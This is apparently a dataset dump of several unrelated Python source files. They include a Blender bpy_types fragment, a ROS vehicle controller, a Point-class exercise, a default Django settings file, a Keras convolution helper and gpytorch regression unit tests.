/ 3.0\n\n @property\n def edge_keys(self):\n verts = self.vertices[:]\n return (\n ord_ind(verts[0], verts[1]),\n ord_ind(verts[1], verts[2]),\n ord_ind(verts[2], verts[0]),\n )\n\n\nclass MeshPolygon(StructRNA):\n __slots__ = ()\n\n @property\n def edge_keys(self):\n verts = self.vertices[:]\n vlen = len(self.vertices)\n return [ord_ind(verts[i], verts[(i + 1) % vlen]) for i in range(vlen)]\n\n @property\n def loop_indices(self):\n start = self.loop_start\n end = start + self.loop_total\n return range(start, end)\n\n\nclass Text(bpy_types.ID):\n __slots__ = ()\n\n def as_string(self):\n \"\"\"Return the text as a string.\"\"\"\n return \"\\n\".join(line.body for line in self.lines)\n\n def from_string(self, string):\n \"\"\"Replace text with this string.\"\"\"\n self.clear()\n self.write(string)\n\n def as_module(self):\n from os.path import splitext\n from types 
import ModuleType\n mod = ModuleType(splitext(self.name)[0])\n # TODO: We could use Text.compiled (C struct member)\n # if this is called often it will be much faster.\n exec(self.as_string(), mod.__dict__)\n return mod\n\n\nclass Sound(bpy_types.ID):\n __slots__ = ()\n\n @property\n def factory(self):\n \"\"\"The aud.Factory object of the sound.\"\"\"\n import aud\n return aud._sound_from_pointer(self.as_pointer())\n\n\nclass RNAMeta(type):\n # TODO(campbell): move to C-API\n @property\n def is_registered(cls):\n return \"bl_rna\" in cls.__dict__\n\n\nclass RNAMetaPropGroup(StructMetaPropGroup, RNAMeta):\n pass\n\n\n# Same as 'Operator'\n# only without 'as_keywords'\nclass Gizmo(StructRNA):\n __slots__ = ()\n\n def __getattribute__(self, attr):\n properties = StructRNA.path_resolve(self, \"properties\")\n bl_rna = getattr(properties, \"bl_rna\", None)\n if (bl_rna is not None) and (attr in bl_rna.properties):\n return getattr(properties, attr)\n return super().__getattribute__(attr)\n\n def __setattr__(self, attr, value):\n properties = StructRNA.path_resolve(self, \"properties\")\n bl_rna = getattr(properties, \"bl_rna\", None)\n if (bl_rna is not None) and (attr in bl_rna.properties):\n return setattr(properties, attr, value)\n return super().__setattr__(attr, value)\n\n def __delattr__(self, attr):\n properties = StructRNA.path_resolve(self, \"properties\")\n bl_rna = getattr(properties, \"bl_rna\", None)\n if (bl_rna is not None) and (attr in bl_rna.properties):\n return delattr(properties, attr)\n return super().__delattr__(attr)\n\n from _bpy import (\n _rna_gizmo_target_set_handler as target_set_handler,\n _rna_gizmo_target_get_value as target_get_value,\n _rna_gizmo_target_set_value as target_set_value,\n _rna_gizmo_target_get_range as target_get_range,\n )\n\n # Convenience wrappers around private `_gpu` module.\n def draw_custom_shape(self, shape, *, matrix=None, select_id=None):\n \"\"\"\n Draw a shape created form :class:`bpy.types.Gizmo.draw_custom_shape`.\n\n :arg shape: The cached shape to draw.\n :type shape: Undefined.\n :arg matrix: 4x4 matrix, when not given\n :class:`bpy.types.Gizmo.matrix_world` is used.\n :type matrix: :class:`mathutils.Matrix`\n :arg select_id: The selection id.\n Only use when drawing within :class:`bpy.types.Gizmo.draw_select`.\n :type select_it: int\n \"\"\"\n import gpu\n\n if matrix is None:\n matrix = self.matrix_world\n\n batch, shader = shape\n shader.bind()\n\n if select_id is not None:\n gpu.select.load_id(select_id)\n else:\n if self.is_highlight:\n color = (*self.color_highlight, self.alpha_highlight)\n else:\n color = (*self.color, self.alpha)\n shader.uniform_float(\"color\", color)\n\n with gpu.matrix.push_pop():\n gpu.matrix.multiply_matrix(matrix)\n batch.draw()\n\n @staticmethod\n def new_custom_shape(type, verts):\n \"\"\"\n Create a new shape that can be passed to :class:`bpy.types.Gizmo.draw_custom_shape`.\n\n :arg type: The type of shape to create in (POINTS, LINES, TRIS, LINE_STRIP).\n :type type: string\n :arg verts: Coordinates.\n :type verts: sequence of of 2D or 3D coordinates.\n :arg display_name: Optional callback that takes the full path, returns the name to display.\n :type display_name: Callable that takes a string and returns a string.\n :return: The newly created shape.\n :rtype: Undefined (it may change).\n \"\"\"\n import gpu\n from gpu.types import (\n GPUBatch,\n GPUVertBuf,\n GPUVertFormat,\n )\n dims = len(verts[0])\n if dims not in {2, 3}:\n raise ValueError(\"Expected 2D or 3D vertex\")\n fmt = 
GPUVertFormat()\n pos_id = fmt.attr_add(id=\"pos\", comp_type='F32', len=dims, fetch_mode='FLOAT')\n vbo = GPUVertBuf(len=len(verts), format=fmt)\n vbo.attr_fill(id=pos_id, data=verts)\n batch = GPUBatch(type=type, buf=vbo)\n shader = gpu.shader.from_builtin('3D_UNIFORM_COLOR' if dims == 3 else '2D_UNIFORM_COLOR')\n batch.program_set(shader)\n return (batch, shader)\n\n\n# Dummy class to keep the reference in `bpy_types_dict` and avoid\n# erros like: \"TypeError: expected GizmoGroup subclass of class ...\"\nclass GizmoGroup(StructRNA):\n __slots__ = ()\n\n\n# Only defined so operators members can be used by accessing self.order\n# with doc generation 'self.properties.bl_rna.properties' can fail\nclass Operator(StructRNA, metaclass=RNAMeta):\n __slots__ = ()\n\n def __getattribute__(self, attr):\n properties = StructRNA.path_resolve(self, \"properties\")\n bl_rna = getattr(properties, \"bl_rna\", None)\n if (bl_rna is not None) and (attr in bl_rna.properties):\n return getattr(properties, attr)\n return super().__getattribute__(attr)\n\n def __setattr__(self, attr, value):\n properties = StructRNA.path_resolve(self, \"properties\")\n bl_rna = getattr(properties, \"bl_rna\", None)\n if (bl_rna is not None) and (attr in bl_rna.properties):\n return setattr(properties, attr, value)\n return super().__setattr__(attr, value)\n\n def __delattr__(self, attr):\n properties = StructRNA.path_resolve(self, \"properties\")\n bl_rna = getattr(properties, \"bl_rna\", None)\n if (bl_rna is not None) and (attr in bl_rna.properties):\n return delattr(properties, attr)\n return super().__delattr__(attr)\n\n def as_keywords(self, ignore=()):\n \"\"\"Return a copy of the properties as a dictionary\"\"\"\n ignore = ignore + (\"rna_type\",)\n return {attr: getattr(self, attr)\n for attr in self.properties.rna_type.properties.keys()\n if attr not in ignore}\n\n\nclass Macro(StructRNA):\n # bpy_types is imported before ops is defined\n # so we have to do a local import on each run\n __slots__ = ()\n\n @classmethod\n def define(self, opname):\n from _bpy import ops\n return ops.macro_define(self, opname)\n\n\nclass PropertyGroup(StructRNA, metaclass=RNAMetaPropGroup):\n __slots__ = ()\n\n\nclass RenderEngine(StructRNA, metaclass=RNAMeta):\n __slots__ = ()\n\n\nclass KeyingSetInfo(StructRNA, metaclass=RNAMeta):\n __slots__ = ()\n\n\nclass AddonPreferences(StructRNA, metaclass=RNAMeta):\n __slots__ = ()\n\n\nclass _GenericUI:\n __slots__ = ()\n\n @classmethod\n def _dyn_ui_initialize(cls):\n draw_funcs = getattr(cls.draw, \"_draw_funcs\", None)\n\n if draw_funcs is None:\n\n def draw_ls(self, context):\n # ensure menus always get default context\n operator_context_default = self.layout.operator_context\n\n # Support filtering out by owner\n workspace = context.workspace\n if workspace.use_filter_by_owner:\n owner_names = {owner_id.name for owner_id in workspace.owner_ids}\n else:\n owner_names = None\n\n for func in draw_ls._draw_funcs:\n\n # Begin 'owner_id' filter.\n if owner_names is not None:\n owner_id = getattr(func, \"_owner\", None)\n if owner_id is not None:\n if func._owner not in owner_names:\n continue\n # End 'owner_id' filter.\n\n # so bad menu functions don't stop\n # the entire menu from drawing\n try:\n func(self, context)\n except:\n import traceback\n traceback.print_exc()\n\n self.layout.operator_context = operator_context_default\n\n draw_funcs = draw_ls._draw_funcs = [cls.draw]\n cls.draw = draw_ls\n\n return draw_funcs\n\n @staticmethod\n def _dyn_owner_apply(draw_func):\n from _bpy import 
_bl_owner_id_get\n owner_id = _bl_owner_id_get()\n if owner_id is not None:\n draw_func._owner = owner_id\n\n @classmethod\n def is_extended(cls):\n return bool(getattr(cls.draw, \"_draw_funcs\", None))\n\n @classmethod\n def append(cls, draw_func):\n \"\"\"\n Append a draw function to this menu,\n takes the same arguments as the menus draw function\n \"\"\"\n draw_funcs = cls._dyn_ui_initialize()\n cls._dyn_owner_apply(draw_func)\n draw_funcs.append(draw_func)\n\n @classmethod\n def prepend(cls, draw_func):\n \"\"\"\n Prepend a draw function to this menu, takes the same arguments as\n the menus draw function\n \"\"\"\n draw_funcs = cls._dyn_ui_initialize()\n cls._dyn_owner_apply(draw_func)\n draw_funcs.insert(0, draw_func)\n\n @classmethod\n def remove(cls, draw_func):\n \"\"\"Remove a draw function that has been added to this menu\"\"\"\n draw_funcs = cls._dyn_ui_initialize()\n try:\n draw_funcs.remove(draw_func)\n except ValueError:\n pass\n\n\nclass Panel(StructRNA, _GenericUI, metaclass=RNAMeta):\n __slots__ = ()\n\n\nclass UIList(StructRNA, _GenericUI, metaclass=RNAMeta):\n __slots__ = ()\n\n\nclass Header(StructRNA, _GenericUI, metaclass=RNAMeta):\n __slots__ = ()\n\n\nclass Menu(StructRNA, _GenericUI, metaclass=RNAMeta):\n __slots__ = ()\n\n def path_menu(self, searchpaths, operator, *,\n props_default=None, prop_filepath=\"filepath\",\n filter_ext=None, filter_path=None, display_name=None,\n add_operator=None):\n \"\"\"\n Populate a menu from a list of paths.\n\n :arg searchpaths: Paths to scan.\n :type searchpaths: sequence of strings.\n :arg operator: The operator id to use with each file.\n :type operator: string\n :arg prop_filepath: Optional operator filepath property (defaults to \"filepath\").\n :type prop_filepath: string\n :arg props_default: Properties to assign to each operator.\n :type props_default: dict\n :arg filter_ext: Optional callback that takes the file extensions.\n\n Returning false excludes the file from the list.\n\n :type filter_ext: Callable that takes a string and returns a bool.\n :arg display_name: Optional callback that takes the full path, returns the name to display.\n :type display_name: Callable that takes a string and returns a string.\n \"\"\"\n\n layout = self.layout\n\n import os\n import bpy.utils\n\n layout = self.layout\n\n if not searchpaths:\n layout.label(text=\"* Missing Paths *\")\n\n # collect paths\n files = []\n for directory in searchpaths:\n files.extend([\n (f, os.path.join(directory, f))\n for f in os.listdir(directory)\n if (not f.startswith(\".\"))\n if ((filter_ext is None) or\n (filter_ext(os.path.splitext(f)[1])))\n if ((filter_path is None) or\n (filter_path(f)))\n ])\n\n files.sort()\n\n col = layout.column(align=True)\n\n for f, filepath in files:\n # Intentionally pass the full path to 'display_name' callback,\n # since the callback may want to use part a directory in the name.\n row = col.row(align=True)\n name = display_name(filepath) if display_name else bpy.path.display_name(f)\n props = row.operator(\n operator,\n text=name,\n translate=False,\n )\n\n if props_default is not None:\n for attr, value in props_default.items():\n setattr(props, attr, value)\n\n setattr(props, prop_filepath, filepath)\n if operator == \"script.execute_preset\":\n props.menu_idname = self.bl_idname\n\n if add_operator:\n props = row.operator(add_operator, text=\"\", icon='REMOVE')\n props.name = name\n props.remove_name = True\n\n if add_operator:\n wm = bpy.data.window_managers[0]\n\n layout.separator()\n row = layout.row()\n\n sub = 
row.row()\n sub.emboss = 'NORMAL'\n sub.prop(wm, \"preset_name\", text=\"\")\n\n props = row.operator(add_operator, text=\"\", icon='ADD')\n props.name = wm.preset_name\n\n def draw_preset(self, _context):\n \"\"\"\n Define these on the subclass:\n - preset_operator (string)\n - preset_subdir (string)\n\n Optionally:\n - preset_add_operator (string)\n - preset_extensions (set of strings)\n - preset_operator_defaults (dict of keyword args)\n \"\"\"\n import bpy\n ext_valid = getattr(self, \"preset_extensions\", {\".py\", \".xml\"})\n props_default = getattr(self, \"preset_operator_defaults\", None)\n add_operator = getattr(self, \"preset_add_operator\", None)\n self.path_menu(\n bpy.utils.preset_paths(self.preset_subdir),\n self.preset_operator,\n props_default=props_default,\n filter_ext=lambda ext: ext.lower() in ext_valid,\n add_operator=add_operator,\n )\n\n @classmethod\n def draw_collapsible(cls, context, layout):\n # helper function for (optionally) collapsed header menus\n # only usable within headers\n if context.area.show_menus:\n # Align menus to space them closely.\n layout.row(align=True).menu_contents(cls.__name__)\n else:\n layout.menu(cls.__name__, icon='COLLAPSEMENU')\n\n\nclass NodeTree(bpy_types.ID, metaclass=RNAMetaPropGroup):\n __slots__ = ()\n\n\nclass Node(StructRNA, metaclass=RNAMetaPropGroup):\n __slots__ = ()\n\n @classmethod\n def poll(cls, _ntree):\n return True\n\n\nclass NodeInternal(Node):\n __slots__ = ()\n\n\nclass NodeSocket(StructRNA, metaclass=RNAMetaPropGroup):\n __slots__ = ()\n\n @property\n def links(self):\n \"\"\"List of node links from or to this socket. Warning: takes O(len(nodetree.links)) time.\"\"\"\n return tuple(\n link for link in self.id_data.links\n if (link.from_socket == self or\n link.to_socket == self))\n\n\nclass NodeSocketInterface(StructRNA, metaclass=RNAMetaPropGroup):\n __slots__ = ()\n\n\n# These are intermediate subclasses, need a bpy type too\nclass CompositorNode(NodeInternal):\n __slots__ = ()\n\n @classmethod\n def poll(cls, ntree):\n return ntree.bl_idname == 'CompositorNodeTree'\n\n def update(self):\n self.tag_need_exec()\n\n\nclass ShaderNode(NodeInternal):\n __slots__ = ()\n\n @classmethod\n def poll(cls, ntree):\n return ntree.bl_idname == 'ShaderNodeTree'\n\n\nclass TextureNode(NodeInternal):\n __slots__ = ()\n\n @classmethod\n def poll(cls, ntree):\n return ntree.bl_idname == 'TextureNodeTree'\n"} {"ext": "py", "sha": "1a2eb231f732213c6256302bf03a1bd5272aacd8", "content": "import rospy\n\nfrom yaw_controller import YawController\nfrom pid import PID \nfrom lowpass import LowPassFilter\n\n\n\nGAS_DENSITY = 2.858\nONE_MPH = 0.44704\n\n\nclass Controller(object):\n def __init__(self, wheel_base, steer_ratio, max_lat_accel, max_steer_angle, accel_limit, decel_limit, vehicle_mass, fuel_capacity, brake_deadband,wheel_radius): \n\n\tself.yaw_controller = YawController(wheel_base, steer_ratio, 0.1, max_lat_accel, max_steer_angle)\n\tkp = 0.3\n\tki = 0.1\n\tkd = 0.\n\tmn = 0.\n\tmx = 0.2\n\tself.throttle_controller = PID(kp,ki,kd,mn,mx)\n\n\ttau = 0.5 #1/(2pi*tau) cutoff frequency\n\tts = 0.02 #sample_time\n\tself.vel_lpf = LowPassFilter(tau, ts)\n\n\tself.vehicle_mass = vehicle_mass\n\tself.fuel_capacity = fuel_capacity\n\tself.brake_deadband = brake_deadband\n\tself.decel_limit = decel_limit\n\tself.accel_limit = accel_limit\n\tself.wheel_radius = wheel_radius\n\n\tself.last_time = rospy.get_time()\n\n\n\n def control(self, current_vel, dbw_enabled, linear_vel,angular_vel):\n\n # TODO: Change the arg, kwarg list to suit 
your needs\n # Return throttle, brake, steer\n\n\tif not dbw_enabled:\n\t self.throttle_controller.reset()\n\t return 0.0, 0., 0.\n\n\tcurrent_vel = self.vel_lpf.filt(current_vel)\n\t \n\n\t# rospy.logwarn(\"Angular vel : {0}\".format(angular_vel))\n\t# rospy.logwarn(\"target vel : {0}\".format(linear_vel))\n\t# rospy.logwarn(\"current vel : {0}\".format(current_vel))\n\n\tsteering = self.yaw_controller.get_steering(linear_vel, angular_vel, current_vel)\n\n\tvel_error = linear_vel - current_vel\n\tself.last_vel = current_vel\n\n\tcurrent_time = rospy.get_time()\n\tsample_time = current_time - self.last_time\n\tself.last_time = current_time\n\n\tthrottle = self.throttle_controller.step(vel_error, sample_time)\n\tbrake = 0\n\n\tif linear_vel == 0. and current_vel < 1.0:\n\t throttle = 0\n\t brake = 400 #N*m to hold the car when we stop at light\n\telif throttle < 0.1 and vel_error < 0:\n\t throttle = 0\n \t decel = max(vel_error, self.decel_limit)\n\t brake = abs(decel)*self.vehicle_mass*self.wheel_radius\n\n\treturn throttle, brake, steering\n"} {"ext": "py", "sha": "1a2eb275e3a88ee2fe89218b22290c923339ca59", "content": "# Rewrite the distance function from the chapter titled Fruitful functions\n# so that it takes two Points as parameters instead of four numbers.\n\nclass Point:\n \"\"\" Point class represents and manipulates x,y coords. \"\"\"\n\n def __init__(self, x=0, y=0):\n \"\"\" Create a new point at the origin \"\"\"\n self.x = x\n self.y = y\n\n def __str__(self):\n return \"({0}, {1})\".format(self.x, self.y)\n\n def distance_from_origin(self):\n \"\"\" Compute my distance from the origin \"\"\"\n return ((self.x ** 2) + (self.y ** 2)) ** 0.5\n\n def halfway(self, target):\n \"\"\" Return the halfway point between myself and the target \"\"\"\n mx = (self.x + target.x) / 2\n my = (self.y + target.y) / 2\n return Point(mx, my)\n\n# Add a method reflect_x to Point which returns a new Point,\n# one which is the reflection of the point about the x-axis. For example, Point(3, 5).reflect_x() is (3, -5)\n\n def reflect_x(self):\n refx = (self.x)\n refy = -(self.y)\n return Point(refx, refy)\n\n# Rewrite the distance function from the chapter titled Fruitful functions\n # so that it takes two Points as parameters instead of four numbers.\n def distance(p1, p2):\n dx = p2.x - p1.x\n dy = p2.y - p1.y\n dsquared = dx*dx + dy*dy\n result = dsquared**0.5\n return result\n\n# Add a method slope_from_origin which returns the slope of the line joining the origin to the point. For example,\n# Point(4, 10).slope_from_origin()\n# 2.5\n\n def slope_from_origin(self):\n return self.y/self.x\n# What cases will cause this method to fail? -> division by zero\n\n# The equation of a straight line is “y = ax + b”, (or perhaps “y = mx + c”).\n# The coefficients a and b completely describe the line.\n# Write a method in the Point class so that if a point instance is given another point,\n# it will compute the equation of the straight line joining the two points.\n# It must return the two coefficients as a tuple of two values. 
For example,\n# print(Point(4, 11).get_line_to(Point(6, 15)))\n# (2, 3)\n\n def get_line_to(self, target):\n mx = target.x-self.x\n my = target.y-self.y\n slope = my/mx\n b = self.y - (slope * self.x)\n return (slope, b)\n\nprint(Point(4, 11).get_line_to(Point(6, 15)))\n"} {"ext": "py", "sha": "1a2eb2a46d6034a72443905fc5ceafa74652e189", "content": "from proteus import Context\nfrom proteus import Comm\ncomm = Comm.get()\nctx = Context.get()\n\n# simulation flags for error analysis\n#\n# simFlagsList is initialized in proteus.iproteus\n#\nsimFlagsList[0]['errorQuantities']=['u']\nsimFlagsList[0]['errorTypes']= ['numericalSolution'] #compute error in soln and glob. mass bal\nsimFlagsList[0]['errorNorms']= ['L2','H1'] #compute L2 norm in space or H0 or ...\nsimFlagsList[0]['errorTimes']= ['Last'] #'All', 'Last'\nsimFlagsList[0]['echo']=True\n\n#\nstart\nquit\n"} {"ext": "py", "sha": "1a2eb3e02d38f25d69dea4a31c9eb8d46c026644", "content": "\"\"\"\nDjango settings for bbs project.\n\nGenerated by 'django-admin startproject' using Django 1.11.7.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.11/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.11/ref/settings/\n\"\"\"\n\nimport os\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '6gmpi&j6a5#sbn^d$v41)5xx8j@1yq5bi3_-p3%pu-!e=0m$r!'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'bbs.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'bbs.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.11/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n\n# Password validation\n# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 
'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.11/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.11/howto/static-files/\n\nSTATIC_URL = '/static/'\n"} {"ext": "py", "sha": "1a2eb3e939bb20fab5e85474d5b1d38f42136d12", "content": "from keras_applications import get_submodules_from_kwargs\n\n\ndef Conv2dBn(\n filters,\n kernel_size,\n strides=(1, 1),\n padding='valid',\n data_format=None,\n dilation_rate=(1, 1),\n activation=None,\n activation_dtype=None,\n kernel_initializer='glorot_uniform',\n bias_initializer='zeros',\n kernel_regularizer=None,\n bias_regularizer=None,\n activity_regularizer=None,\n kernel_constraint=None,\n bias_constraint=None,\n use_batchnorm=False,\n **kwargs\n):\n \"\"\"Extension of Conv2D layer with batchnorm\"\"\"\n\n conv_name, act_name, bn_name = None, None, None\n block_name = kwargs.pop('name', None)\n backend, layers, models, keras_utils = get_submodules_from_kwargs(kwargs)\n\n if block_name is not None:\n conv_name = block_name + '_conv'\n\n if block_name is not None and activation is not None:\n act_str = activation.__name__ if callable(activation) else str(activation)\n act_name = block_name + '_' + act_str\n\n if block_name is not None and use_batchnorm:\n bn_name = block_name + '_bn'\n\n bn_axis = 3 if backend.image_data_format() == 'channels_last' else 1\n\n def wrapper(input_tensor):\n\n x = layers.Conv2D(\n filters=filters,\n kernel_size=kernel_size,\n strides=strides,\n padding=padding,\n data_format=data_format,\n dilation_rate=dilation_rate,\n activation=None,\n use_bias=not (use_batchnorm),\n kernel_initializer=kernel_initializer,\n bias_initializer=bias_initializer,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n activity_regularizer=activity_regularizer,\n kernel_constraint=kernel_constraint,\n bias_constraint=bias_constraint,\n name=conv_name,\n )(input_tensor)\n\n if use_batchnorm:\n x = layers.BatchNormalization(axis=bn_axis, name=bn_name)(x)\n\n if activation:\n if activation_dtype is None:\n x = layers.Activation(activation, name=act_name)(x)\n else:\n x = layers.Activation(activation, name=act_name, dtype=activation_dtype)(x)\n\n return x\n\n return wrapper\n"} {"ext": "py", "sha": "1a2eb4a9fef6c85cf3a67200f11d7b95a09f8f7c", "content": "#!/usr/bin/env python3\n\nimport os\nimport random\nimport unittest\nfrom math import exp, pi\n\nimport gpytorch\nimport torch\nfrom gpytorch.distributions import MultivariateNormal\nfrom gpytorch.kernels import RBFKernel, ScaleKernel\nfrom gpytorch.likelihoods import GaussianLikelihood, FixedNoiseGaussianLikelihood\nfrom gpytorch.means import ConstantMean\nfrom gpytorch.priors import SmoothedBoxPrior\nfrom gpytorch.test.utils import least_used_cuda_device\nfrom torch import optim\n\n\nclass ExactGPModel(gpytorch.models.ExactGP):\n def __init__(self, train_inputs, train_targets, likelihood):\n super(ExactGPModel, self).__init__(train_inputs, train_targets, likelihood)\n self.mean_module = ConstantMean(prior=SmoothedBoxPrior(-1, 1))\n self.rbf_covar_module = RBFKernel(lengthscale_prior=SmoothedBoxPrior(exp(-3), exp(3), sigma=0.1))\n self.covar_module = ScaleKernel(self.rbf_covar_module)\n\n def forward(self, x):\n mean_x = self.mean_module(x)\n covar_x = self.covar_module(x)\n return MultivariateNormal(mean_x, covar_x)\n\n\nclass 
TestWhiteNoiseGPRegression(unittest.TestCase):\n def setUp(self):\n if os.getenv(\"UNLOCK_SEED\") is None or os.getenv(\"UNLOCK_SEED\").lower() == \"false\":\n self.rng_state = torch.get_rng_state()\n torch.manual_seed(1)\n if torch.cuda.is_available():\n torch.cuda.manual_seed_all(1)\n random.seed(1)\n\n def tearDown(self):\n if hasattr(self, \"rng_state\"):\n torch.set_rng_state(self.rng_state)\n\n def _get_data(self, cuda=False):\n device = torch.device(\"cuda\") if cuda else torch.device(\"cpu\")\n # Simple training data: let's try to learn a sine function\n train_x = torch.linspace(0, 1, 11, device=device)\n train_y = torch.sin(train_x * (2 * pi))\n test_x = torch.linspace(0, 1, 51, device=device)\n test_y = torch.sin(test_x * (2 * pi))\n return train_x, test_x, train_y, test_y\n\n def test_posterior_latent_gp_and_likelihood_without_optimization(self, cuda=False):\n train_x, test_x, train_y, test_y = self._get_data(cuda=cuda)\n with gpytorch.settings.debug(False):\n # We're manually going to set the hyperparameters to be ridiculous\n likelihood = FixedNoiseGaussianLikelihood(torch.ones(11) * 1e-8)\n gp_model = ExactGPModel(train_x, train_y, likelihood)\n # Update lengthscale prior to accommodate extreme parameters\n gp_model.rbf_covar_module.initialize(lengthscale=exp(-6))\n gp_model.mean_module.initialize(constant=0)\n\n if cuda:\n gp_model.cuda()\n likelihood.cuda()\n\n # Compute posterior distribution\n gp_model.eval()\n likelihood.eval()\n\n # Let's see how our model does, conditioned with weird hyperparams\n # The posterior should fit all the data\n function_predictions = likelihood(gp_model(train_x))\n\n self.assertLess(torch.norm(function_predictions.mean - train_y), 1e-3)\n self.assertLess(torch.norm(function_predictions.variance), 5e-3)\n\n # It shouldn't fit much else though\n test_function_predictions = gp_model(torch.tensor([1.1]).type_as(test_x))\n\n self.assertLess(torch.norm(test_function_predictions.mean - 0), 1e-4)\n self.assertLess(torch.norm(test_function_predictions.variance - gp_model.covar_module.outputscale), 1e-4)\n\n def test_posterior_latent_gp_and_likelihood_without_optimization_cuda(self):\n if torch.cuda.is_available():\n with least_used_cuda_device():\n self.test_posterior_latent_gp_and_likelihood_without_optimization(cuda=True)\n\n def test_posterior_latent_gp_and_likelihood_with_optimization(self, cuda=False):\n train_x, test_x, train_y, test_y = self._get_data(cuda=cuda)\n # We're manually going to set the hyperparameters to something they shouldn't be\n likelihood = FixedNoiseGaussianLikelihood(torch.ones(11) * 0.001)\n gp_model = ExactGPModel(train_x, train_y, likelihood)\n mll = gpytorch.ExactMarginalLogLikelihood(likelihood, gp_model)\n gp_model.rbf_covar_module.initialize(lengthscale=exp(1))\n gp_model.mean_module.initialize(constant=0)\n\n if cuda:\n gp_model.cuda()\n likelihood.cuda()\n\n # Find optimal model hyperparameters\n gp_model.train()\n likelihood.train()\n\n optimizer = optim.Adam(list(gp_model.parameters()) + list(likelihood.parameters()), lr=0.1)\n optimizer.n_iter = 0\n with gpytorch.settings.debug(False):\n for _ in range(75):\n optimizer.zero_grad()\n output = gp_model(train_x)\n loss = -mll(output, train_y)\n loss.backward()\n optimizer.n_iter += 1\n optimizer.step()\n\n for param in gp_model.parameters():\n self.assertTrue(param.grad is not None)\n self.assertGreater(param.grad.norm().item(), 0)\n for param in likelihood.parameters():\n self.assertTrue(param.grad is not None)\n self.assertGreater(param.grad.norm().item(), 0)\n 
optimizer.step()\n\n # Test the model\n gp_model.eval()\n likelihood.eval()\n test_function_predictions = likelihood(gp_model(test_x))\n mean_abs_error = torch.mean(torch.abs(test_y - test_function_predictions.mean))\n\n self.assertLess(mean_abs_error.squeeze().item(), 0.05)\n\n def test_posterior_latent_gp_and_likelihood_with_optimization_cuda(self):\n if torch.cuda.is_available():\n with least_used_cuda_device():\n self.test_posterior_latent_gp_and_likelihood_with_optimization(cuda=True)\n\n def test_posterior_latent_gp_and_likelihood_fast_pred_var(self, cuda=False):\n train_x, test_x, train_y, test_y = self._get_data(cuda=cuda)\n with gpytorch.settings.fast_pred_var(), gpytorch.settings.debug(False):\n # We're manually going to set the hyperparameters to something they shouldn't be\n likelihood = GaussianLikelihood(noise_prior=SmoothedBoxPrior(exp(-3), exp(3), sigma=0.1))\n gp_model = ExactGPModel(train_x, train_y, likelihood)\n mll = gpytorch.mlls.ExactMarginalLogLikelihood(likelihood, gp_model)\n gp_model.rbf_covar_module.initialize(lengthscale=exp(1))\n gp_model.mean_module.initialize(constant=0)\n likelihood.initialize(noise=exp(1))\n\n if cuda:\n gp_model.cuda()\n likelihood.cuda()\n\n # Find optimal model hyperparameters\n gp_model.train()\n likelihood.train()\n optimizer = optim.Adam(list(gp_model.parameters()) + list(likelihood.parameters()), lr=0.1)\n optimizer.n_iter = 0\n for _ in range(50):\n optimizer.zero_grad()\n output = gp_model(train_x)\n loss = -mll(output, train_y)\n loss.backward()\n optimizer.n_iter += 1\n optimizer.step()\n\n for param in gp_model.parameters():\n self.assertTrue(param.grad is not None)\n self.assertGreater(param.grad.norm().item(), 0)\n for param in likelihood.parameters():\n self.assertTrue(param.grad is not None)\n self.assertGreater(param.grad.norm().item(), 0)\n optimizer.step()\n\n # Test the model\n gp_model.eval()\n likelihood.eval()\n # Set the cache\n test_function_predictions = likelihood(gp_model(train_x))\n\n # Now bump up the likelihood to something huge\n # This will make it easy to calculate the variance\n likelihood.raw_noise.data.fill_(3)\n test_function_predictions = likelihood(gp_model(train_x))\n\n noise = likelihood.noise\n var_diff = (test_function_predictions.variance - noise).abs()\n\n self.assertLess(torch.max(var_diff / noise), 0.05)\n\n def test_posterior_latent_gp_and_likelihood_fast_pred_var_cuda(self):\n if torch.cuda.is_available():\n with least_used_cuda_device():\n self.test_posterior_latent_gp_and_likelihood_fast_pred_var(cuda=True)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"} 